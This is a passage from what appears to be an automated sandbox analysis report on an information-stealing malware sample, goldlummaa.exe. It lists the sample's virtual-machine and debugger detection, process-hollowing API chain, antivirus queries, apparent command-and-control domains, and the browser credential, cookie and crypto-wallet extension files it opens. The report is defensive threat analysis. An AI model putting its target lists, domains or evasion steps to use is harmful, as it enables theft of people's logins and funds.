                    Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                    Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.0000000003314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: goldlummaa.exe, 00000003.00000002.2086655679.0000000003C48000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                    Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                    Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                    Source: goldlummaa.exe, 00000003.00000002.2086655679.0000000003C48000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                    Source: C:\Users\user\Desktop\goldlummaa.exeAPI call chain: ExitProcess graph end nodegraph_3-21809
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C678CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C678CC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C7A1A9 mov edi, dword ptr fs:[00000030h]0_2_00C7A1A9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C61770 mov edi, dword ptr fs:[00000030h]0_2_00C61770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C61770 mov edi, dword ptr fs:[00000030h]3_2_00C61770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C69726 GetProcessHeap,0_2_00C69726
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C678CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C678CC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6501B SetUnhandledExceptionFilter,0_2_00C6501B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C65027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C65027
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C645B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C645B7
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C678CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C678CC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6501B SetUnhandledExceptionFilter,3_2_00C6501B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C65027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C65027
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C645B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C645B7

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C7A1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00C7A1A9
                    Source: C:\Users\user\Desktop\goldlummaa.exeMemory written: C:\Users\user\Desktop\goldlummaa.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tacitglibbr.biz
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C648D3 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00C648D3
                    Source: C:\Users\user\Desktop\goldlummaa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\Desktop\goldlummaa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR
                    Source: Yara matchFile source: 3.2.goldlummaa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.goldlummaa.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
